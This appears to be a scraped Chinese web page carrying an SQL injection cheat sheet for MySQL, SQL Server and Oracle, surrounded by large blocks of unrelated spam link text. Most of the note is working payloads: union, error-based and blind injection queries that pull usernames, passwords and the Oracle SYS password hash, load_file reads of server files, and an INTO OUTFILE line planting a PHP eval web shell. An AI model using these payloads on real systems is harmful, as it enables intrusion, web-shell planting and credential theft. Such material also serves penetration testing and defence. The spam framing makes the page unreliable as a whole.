精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

SQL注入速查筆記

運維 數據庫運維
Mysql劃分:權限 root 普通用戶 版本 mysql>5.0 mysql<5.0。

 [[348344]]

0x01 Mysql

Mysql劃分:權限 root 普通用戶 版本 mysql>5.0 mysql<5.0

1.1 root權限

load_file和into outfile用戶必須有FILE權限,并且還需要知道網站的絕對路徑

判斷是否具有讀寫權限

  1. and (select count(*) from mysql.user)>0# 
  2. and (select count(file_priv) from mysql.user)># 

A、Load_file() 該函數用來讀取源文件的函數,只能讀取絕對路徑的網頁文件

注意:路徑符號”\”錯誤 “\”正確 “/”正確,轉換成十六進制,不用“”

  1. id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(’/var/www/index.php’)(物理路徑轉16進制) 

可以用來讀取數據庫連接文件獲取數據連接賬號、密碼等

  1. ?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23 
  2. id=1'and 1=2 union select 1,load_file(0x443A2F77616D702F7777772F312E706870)%23 

B、into outfile函數

條件:1. 絕對路徑 2.可以使用單引號

  1. ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php' 
  2. ?id=1 LIMIT 0,1 INTO OUTFILE 'E:/s 
  3. tudy/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 -- 

1.2 MySQL聯合查詢

1.2.1 適用于mysql低于5.0版本

  1. 1.判斷是否可以注入 
  2.     ?id=1 and 1=1,頁面正常 
  3.     ?id=1 and 1=2,頁面空白 
  4. 2.獲得字段數 
  5. order by的方法來判斷,比如: 
  6.     ?id=1 order by 4   頁面顯示正常 
  7.     ?id=1 order by 5   頁面出錯,說明字段數等于4 
  8. 3.獲得顯示位 
  9.     ?id=1 and 1=2 union select 1,2,3,4  
  10.     //比如,頁面上出現了幾個數字,分別是2,3,4,那么,這幾個數字就被我們稱作顯示位。 
  11. 4.猜表名 
  12.     猜表名的方法是,在第三步的完整的地址后加上:Form 表名,比如: 
  13.         ?id=1 and 1=2 union select 1,2,3,4 from users 
  14.     這樣,當users表存在的話,頁面就會顯示正常,如果我們提交一個不存在的表名,頁面就會出錯。 
  15.  
  16. 5.猜字段 
  17.     使用:Concat(字段名)替換顯示位的位置。 
  18.         ?id=1 and 1=2 union select 1,2,3,concat(username,passwordfrom users 

1.2.2 適用于Mysql 5.0以上版本支持查表查列

  1. 1.先判斷是否可以注入 
  2.     and+1=1,頁面正常 
  3.     and+1=2,頁面空白 
  4. 2.獲得字段數:使用order by 
  5. 提交: 
  6.     ?id=1 order by 4 正確。 
  7.     ?id=1 order by 5 錯誤。 
  8.     那么,判斷出字段數為4。 
  9. 3.獲得顯示位 
  10.  
  11. 提交:?id=1 +and+1=2+union+select+1,2,3,4 
  12. 顯示位為:2,3,4 
  13. 4.獲取信息 
  14.     ?id=1 +and+1=2+union+select+1,2,3,version() 
  15.  
  16.     database()  
  17.     user()   
  18.     version()  
  19.     database()   
  20.     @@basedir  數據庫安裝路徑 
  21.     @@datadir  數據庫路徑 
  22. 5.查表 
  23. ?id=1 and 1=2 union select 1,2,3,table_name from information_schema.tables where table_schema=0x74657374(數據庫名test的Hex) limit 0,1-- 
  24. 得到表:test 
  25.  
  26. 6.查字段 
  27.     ?id=1 and 1=2 union select 1,2,3,column_name from  
  28. information_schema.columns where table_name=0x74657374 limit 0,1-- 
  29.     得到字段:id,username,password 
  30. 7.爆字段內容 
  31.     ?id=1+and+1=2+union+select+1,2,3,concat(username,passwordfrom+test 

1.3 MySQL報錯注入

mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。

多種報錯注入方式:

  1. and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a); 
  2. and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 
  3. and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1))) 
  4. and 1=(updatexml(1,concat(0x3a,(select user())),1)) 
  5. and GeometryCollection((select*from(select*from(select @@version)f)x)) 
  6. and polygon((select*from(select name_const(version(),1))x)) 
  7. and linestring((select * from(select * from(select user())a)b)) 
  8. and multilinestring((select * from(select * from(select version())a)b)); 
  9. and multipoint((select * from(select * from(select user())a)b)); 
  10. and multipolygon((select * from(select * from(select user())a)b)); 
  11. and exp(~(select * from(select version())a)); 

1.4 MySQL盲注

基于布爾型注入

  1. id=1 and (select length(user()))=20 # 返回正常頁面  長度20位 
  2. id=1 and ascii(substring((SELECT username FROM users limit 0,1),1,1))=97 
  3. //截取username第一個數據的ascii值 

基于時間型注入

  1. 1 xor (if(ascii(mid(user()from(1)for(1)))='r',sleep(5),0)) 
  2. 1 xor if(ascii(substr(user(),1,1)) like 1124,benchmark(1000000, md5('1')),'2'

0x02 SQLServer

SA權限:數據庫操作,文件管理,命令執行,注冊表讀取等

Db權限:文件管理,數據庫操作等

Public權限:數據庫操作

2.1 SQLServer 聯合查詢

  1. 1.判斷是否存在注入 
  2.     ?id=1 and 1=1--  返回正確 
  3.     ?id=1 and 1=2--  返回錯誤 
  4.  
  5. 2.獲取字段數 
  6.     ?id=1 order by 2-- 返回正確頁面   
  7.     ?id=1 order by 3-- 返回錯誤頁面    字段長度為2 
  8.  
  9. 3.查看數據庫版本 
  10.     ?id=1 and 1=2 union select  db_name(),null   //獲得當前數據庫 
  11.  
  12. 4.查看表名 
  13.     ?id=1 and 1=2 union select  top 1  TABLE_NAME ,2 from INFORMATION_SCHEMA.TABLES where table_name not in ('users')  
  14.  
  15. 5.查看列名 
  16.     ?id=1 and 1=2 union select  top 1 column_name ,2  from  information_schema.columns where table_name ='users'  and column_name not in ('uname'
  17.  
  18. 6.獲取數據 
  19.     ?id=1 and 1=2 union select top 1 uname,null from users 

2.2 SQLServer 報錯注入

  1. 1.獲取表名 
  2. ?id=4' and 1>(select top 1  TABLE_NAME from INFORMATION_SCHEMA.TABLES  where TABLE_NAME not in ('admin') )-- 
  3. 2.獲取列名 
  4. ?id=4' and 1>(select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin' and column_name not in ('id')) -- 
  5.  
  6. 3.獲取數據 
  7. ?id=4' and 1=(select top 1 pwd from admin) -- 
  8.  
  9. 4.獲取數據庫信息 
  10. ?id=1' and 1=(select @@version)--   //SQL Server 2000 
  11. ?id=1' and 1=(select db_name())  //當前使用的數據庫 

2.3 SQLServer 盲注

  1. 1、猜表名 
  2.  
  3. ?id=1 and  (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u'and len(name)=7)=1 --  //獲取第一個表的長度7 
  4.  
  5. ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u'and ascii(substring(name,1,1))=116)=1 --    //截取第一個表第一位的ascii碼 
  6.  
  7. ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))>115)=1 --//猜第二個表的第一位ASCII值 
  8. 得到表名,進一步猜解字段 
  9.  
  10. 2、猜字段 
  11. id=1 and  
  12. (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users')) and ascii(substring(name,1,1))=117)=1  
  13. //獲取users表第一個字段的ASCII值 
  14.  
  15. id=1 and  
  16. (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users') ) and name not in ('upass')  and ascii(substring(name,1,1))>90)=1  -- 
  17. //獲取user表第二個字段的第一位ASCII值 
  18.  
  19. 3、猜數據 
  20. id=1 and (ascii(substring((select top 1 uname from users),1,1)))=33 --   
  21. //獲取users表中uname字段的第一位ASCII值 

0x03 Oracle

3.1 聯合查詢

  1. Union select null,null,null   從第一個null開始加’null’,得到顯示位 
  2. Union select null,null,null from dual  返回正確,存在dual表 
  3. Union Select tablespace_name from user_tablespaces    //查庫 
  4. Union Select table_name from user_tables where rownum = 1 and table_name<>’news’  //查表 
  5. Union Select column_name from user_tab_columns where table_name=’users’  //查列 
  6. ?id=1 order by 1-- //獲取字段數 
  7. and+1=1+union+all+select+(SELECT banner FROM v$version where rownum=1)+from+dual--//獲取數據庫版本 
  8. and+1=1+union+all+select+(select user from dual where rownum=1)+from+dual-- //獲取當前連接數據庫的用戶名 
  9. union+all+select+(select password from sys.userwhere rownum=1 and name='SYS')+from+dual-- -- //獲取用戶SYS密文密碼 
  10. union+all+select+(SELECT name FROM v$database)+from+dual-- //獲取庫名 
  11. and+1=1+union+all+select+(select table_name from user_tables where rownum=1)+from+dual--//獲取第一個表名 

3.2 手工顯錯注入

  1. 最大的區別就是utl_inaddr.get_host_address這個函數,10g可以調用,11g需要dba高權限 
  2.  
  3. //判斷是否是oracle 
  4. ?id=1 and exists(select * from dual)-- 
  5.  //獲取庫名 
  6. ?id=1 and 1=utl_inaddr.get_host_address((SELECT name FROM v$database))—- 
  7. //獲取數據庫服務器所在ip 
  8. ?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))--  
  9. ?id=1 and 1= CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')-- 
  10. ?id=1 or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')-- 
  11. ?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null -- 
  12. ?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))-- 

3.3 盲注

基于布爾類型的盲注:

  1. ?id=7782' and length((SELECT name FROM v$database))=4--  獲取數據庫名長度 
  2. ?id=7782'  and ascii(substr((SELECT name FROM v$database),1,1))=79--  
  3. 獲取數據庫名第一位為O 

基于時間延遲的盲注:

  1. ?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)-- 
  2. ?id=7782'  AND 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(103)||CHR(102)||CHR(102),5) ELSE 1 END)-- 

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2013-05-02 15:09:22

2010-12-20 16:04:30

2017-08-10 10:23:59

2010-04-13 14:35:17

2020-09-28 09:30:13

mybatis

2010-09-27 11:17:31

2011-10-19 10:47:56

2020-12-16 13:22:37

Web安全SQL工具

2014-11-04 13:43:10

2009-02-04 16:51:48

2020-08-07 08:13:08

SQL攻擊模式

2009-07-24 16:59:57

iBatis模糊查詢

2009-10-25 13:32:09

2009-11-02 13:47:09

2021-09-16 09:05:45

SQL注入漏洞網絡攻擊

2019-02-22 09:00:00

2016-09-06 13:40:20

2010-10-22 15:18:18

SQL注入漏洞

2015-08-26 11:12:11

數據溢出SQL注入SQL報錯注入

2009-02-04 16:11:45

點贊
收藏

51CTO技術棧公眾號

欧美aa一级| 神马久久精品| 欧美一区二区三区免费看| 欧美日韩成人在线一区| 浴室偷拍美女洗澡456在线| 日本激情视频网站| 日韩在线a电影| 久久综合久中文字幕青草| 中文字幕天堂av| av成人在线看| 午夜精品久久久久久久久久| 日韩精品久久久毛片一区二区| av中文字幕观看| 久久午夜精品| 欧美激情视频一区二区| 一级在线观看视频| 久久365资源| 欧美日韩成人一区二区| 国产aaa一级片| 色呦呦在线视频| 国产精品污www在线观看| 国产伦精品一区二区三区高清| 亚洲国产无线乱码在线观看| 精品成人在线| 久久久精品亚洲| 亚洲a v网站| 欧美日韩导航| 精品国产区一区| 黄色一级片免费播放| japanese23hdxxxx日韩| 天涯成人国产亚洲精品一区av| 在线无限看免费粉色视频| 九九九伊在人线综合| 99视频在线精品| 91免费版网站在线观看| 中文字幕在线播出| 久久视频一区| 欧美一级大片在线观看| 久久久久性色av无码一区二区| 色婷婷热久久| 中文字幕日韩视频| 欧美激情视频二区| 欧美精品一区二区久久| 亚洲女同精品视频| 中文字幕影片免费在线观看| 噜噜噜天天躁狠狠躁夜夜精品| 欧美一区二区人人喊爽| 亚洲一区二区图片| 日韩福利在线观看| 欧美日韩国产乱码电影| 在线观看免费黄网站| 欧美三区四区| 欧美视频在线一区| 亚州精品一二三区| 欧美91在线|欧美| 欧美日韩三级视频| 在线观看免费不卡av| 亚洲国产天堂| 69av一区二区三区| 亚洲天堂网站在线| 国内不卡的一区二区三区中文字幕| 欧美日韩高清一区| 久久精品无码一区二区三区毛片| 国模大尺度视频一区二区| 欧美一级电影网站| 日韩av手机在线播放| 欧美三级午夜理伦三级在线观看 | 搡女人真爽免费午夜网站| 国产免费不卡| 欧美又粗又大又爽| 在线免费观看av网| 成人18夜夜网深夜福利网| 日韩av在线免费看| 丰满少妇一区二区| 日韩欧美视频在线播放| 久久国产天堂福利天堂| 国产真人真事毛片| 三级精品在线观看| 成人日韩在线电影| 韩国av免费在线观看| 91在线观看地址| 亚洲精品日韩在线观看| 1区2区3区在线视频| 亚瑟在线精品视频| 九九热免费精品视频| 国产高清精品二区| 亚洲精品国产精品自产a区红杏吧| 亚洲码无人客一区二区三区| 91精品综合久久久久久久久久久| 色综合久久精品亚洲国产| 亚洲免费在线观看av| 美女一区二区视频| 国产日韩欧美一区二区三区四区| 国产专区在线| 亚洲一区二区三区四区在线| 国产成人无码一二三区视频| 懂色av色香蕉一区二区蜜桃| 日韩精品亚洲元码| 视频这里只有精品| 久久久噜噜噜久久狠狠50岁| 成人免费激情视频| 青草久久伊人| 又紧又大又爽精品一区二区| 成人一区二区三| 国产精伦一区二区三区| 色噜噜狠狠狠综合曰曰曰| 你懂的国产视频| 韩国v欧美v亚洲v日本v| 蜜桃视频在线观看成人| 日本中文字幕中出在线| 在线观看成人小视频| 国产麻豆剧传媒精品国产av| 国产精品久久久久久久久久10秀| 97超级碰碰人国产在线观看| 99精品久久久久久中文字幕| 国产午夜精品一区二区三区四区| 轻点好疼好大好爽视频| 亚洲国产天堂| 在线电影欧美日韩一区二区私密| 中文字幕第28页| 国产一区二区视频在线| 水蜜桃亚洲一二三四在线| av资源中文在线| 日韩视频一区二区三区在线播放| 五月婷婷欧美激情| 久久男女视频| 蜜桃传媒视频麻豆一区| 国产又色又爽又黄刺激在线视频| 777午夜精品视频在线播放| 日本xxxxxxxxx18| 国产日本精品| 国产亚洲欧美一区二区| 亚洲精品白浆| 91精品欧美一区二区三区综合在 | 国产精品一区二区99| 国内精品伊人久久| 亚洲第一大网站| 亚洲日本一区二区三区| 久久综合在线观看| 91国语精品自产拍| 成人欧美一区二区三区在线湿哒哒| 国产区高清在线| 色婷婷av一区二区| 在线观看国产精品一区| 久久久一二三| 欧美午夜精品久久久久免费视| 密臀av在线播放| 日韩精品在线私人| 久久久久久在线观看| 久久久夜色精品亚洲| 麻豆传传媒久久久爱| 精品一区二区三区中文字幕老牛| 国产精品免费视频xxxx| 91网页在线观看| 欧美日韩亚洲高清一区二区| 欧美人与禽zoz0善交| 美女mm1313爽爽久久久蜜臀| 亚洲三区在线| 亚洲一区av| 免费不卡在线观看av| 亚洲av无码一区二区三区dv| 亚洲成人自拍偷拍| 欧美 日本 国产| 日韩精品视频网| 亚洲最新在线| 秋霞一区二区三区| 午夜精品一区二区三区在线视| 日韩一级片免费看| 色综合网站在线| x88av在线| 国产传媒一区在线| 91好吊色国产欧美日韩在线| 国产一区日韩| 91免费视频国产| 3344国产永久在线观看视频| 亚洲片av在线| 国产人妖一区二区| 欧美日韩中文字幕在线视频| 粉嫩精品久久99综合一区| 国产风韵犹存在线视精品| 美女日批免费视频| 欧美好骚综合网| 国产一区二区三区四区五区在线| 香蕉视频亚洲一级| 欧美另类老女人| 久久手机免费观看| 日韩欧美国产综合一区| 一级黄色免费网站| 综合分类小说区另类春色亚洲小说欧美 | 日韩欧美国产综合一区| 日韩手机在线视频| 一区二区三区免费| 亚洲午夜久久久久久久国产| 国产成人午夜99999| 免费日韩视频在线观看| 在线看片不卡| 欧美精品一区二区三区在线四季| 粉嫩一区二区三区在线观看| 欧美性受xxxx黑人猛交| 二区在线播放| 亚洲日韩中文字幕| 不卡视频在线播放| 精品视频在线免费看| 伊人365影院| 国产精品不卡一区二区三区| www.免费av| 懂色av一区二区在线播放| 免费看国产黄色片| 一本色道久久| 国产尤物av一区二区三区| 成人在线国产| 久久精品国产精品青草色艺| 国产在线不卡一区二区三区| 国产精品激情av电影在线观看| 超碰在线资源| 美日韩丰满少妇在线观看| √新版天堂资源在线资源| 国产视频在线一区二区| 成人免费一级视频| 91精品国产免费| 96日本xxxxxⅹxxx17| 色综合久久综合网欧美综合网| 精品人妻在线播放| 亚洲女与黑人做爰| 国产精品99久久久久久成人| 日本一区二区三区在线观看| 亚洲自拍偷拍一区二区| 99精品欧美一区二区三区小说 | 国产一区二区三区精彩视频 | www.97超碰| 欧美精品一卡两卡| 一级黄色大片免费观看| 欧美日韩在线精品一区二区三区激情| 久草视频一区二区| 欧美色xxxx| 午夜精品三级久久久有码| 亚洲一区二区三区视频在线播放 | 亚洲AV无码国产精品| 99精品国产一区二区三区不卡| 国产精品亚洲一区二区无码| 粉嫩绯色av一区二区在线观看 | 欧美乱妇高清无乱码| 超鹏97在线| 欧美高清第一页| 色图在线观看| 欧美激情视频网站| 第一福利在线视频| 97在线观看视频国产| 丝袜诱惑一区二区| 日韩av电影手机在线观看| 波多视频一区| 国产精品偷伦一区二区| 日本在线精品| 国产免费亚洲高清| 国产精品毛片无码| 国产精品区一区二区三在线播放| 福利电影一区| 久久综合九九| 欧美理论在线播放| 性做爰过程免费播放| 欧美日韩第一区| 妞干网在线视频观看| 日韩一级免费| 天天天干夜夜夜操| 狠狠色伊人亚洲综合成人| 欧美日韩一区二区区| 成人丝袜高跟foot| 黄色在线观看av| 欧美国产日产图区| 成年人一级黄色片| 欧美日韩综合视频网址| 成人黄色片在线观看| 日韩一区二区三区电影 | 视频精品一区二区三区| 国产乱码精品一区二区三区日韩精品 | 欧美视频一区二区| 国产黄色片免费| 国产丝袜一区视频在线观看| 午夜视频在线观看网站| 久久久久亚洲精品成人网小说| 欧美电影网址| 97久久人人超碰caoprom欧美| 欧美挤奶吃奶水xxxxx| 亚洲mv在线看| 一本久久综合| 国产大片一区二区三区| 97久久精品人人做人人爽50路| 在线观看亚洲大片短视频| 一区二区三区在线观看网站| 日韩色图在线观看| 欧美一级片免费看| 你懂的视频在线观看| 久久69精品久久久久久国产越南| av高清不卡| 91黄在线观看| 欧美老女人另类| 男人的天堂狠狠干| 激情五月播播久久久精品| 亚洲国产综合视频| 一区二区欧美在线观看| 丰满少妇xoxoxo视频| 精品久久久久一区| 三级外国片在线观看视频| 97视频免费在线看| 国产高清日韩| 亚洲国产一区二区三区在线播| 激情国产一区| 欧美午夜精品理论片| 久久久91精品国产一区二区精品| 欧美日韩在线观看成人| 欧美三级在线视频| 欧美美女搞黄| 68精品久久久久久欧美| 亚洲精品一区二区三区中文字幕| 日韩精品av一区二区三区| 国产精品久久777777毛茸茸 | 看欧美ab黄色大片视频免费| 丁香一区二区三区| 三级在线观看免费大全| 欧美性猛交xxxx乱大交退制版| 午夜国产在线视频| 97久久久久久| jizz性欧美23| 男人添女人下部视频免费| 国产一区二区三区黄视频| 国产精品1区2区3区4区| 欧美亚洲综合久久| 国内av一区二区三区| 日本成熟性欧美| 羞羞色国产精品网站| 免费看国产曰批40分钟| 成人毛片在线观看| 国产亚洲精品码| 欧美大片一区二区三区| 色爱综合区网| 91在线播放视频| 国产精品s色| 亚洲精品一二三四| 一区二区三区在线视频观看58| 99国产精品久久久久久久成人| 日韩一区二区三区在线播放| 美女色狠狠久久| 午夜欧美性电影| 美女视频免费一区| 免费成人深夜夜行网站| 欧美一区二区三区在线观看视频| 麻豆91在线| 亚洲伊人第一页| 欧美三区不卡| 亚洲av成人无码一二三在线观看| 五月天一区二区| 女人天堂在线| 国产精品高潮在线| 国产精品伦理久久久久久| 日韩不卡的av| 亚洲不卡在线观看| 青青操在线视频| 国产欧美一区二区三区久久人妖| 99久久精品费精品国产| 手机看片国产精品| 亚洲成人动漫av| 美州a亚洲一视本频v色道| 国产精品国产三级国产aⅴ浪潮| 日韩欧美不卡| 成人欧美精品一区二区| 岛国av一区二区在线在线观看| 精品电影在线| 成人免费视频网址| 亚洲午夜伦理| 亚洲国产天堂av| 这里只有精品视频在线观看| heyzo在线播放| 日韩精品大片| 国产成人综合在线| 欧美一区免费看| 精品国产欧美成人夜夜嗨| 亚洲专区**| 欧美视频免费播放| 亚洲天堂a在线| 手机亚洲第一页| 成人性生交xxxxx网站| 亚洲精品男同| 日日操免费视频| 亚洲福利视频久久| 99久久er| 你懂的av在线| 亚洲天堂a在线| 天堂a√在线| 亚洲自拍欧美另类| 久久婷婷av| 国产一级免费观看| 综合国产在线视频| 精品国产乱子伦一区二区| 蜜臀一区二区三区精品免费视频| 亚洲午夜在线视频| 日本www在线观看| 久久精品国产第一区二区三区最新章节 | 精品国产91乱码一区二区三区四区| 久久精品无码一区二区三区毛片| 色婷婷亚洲精品|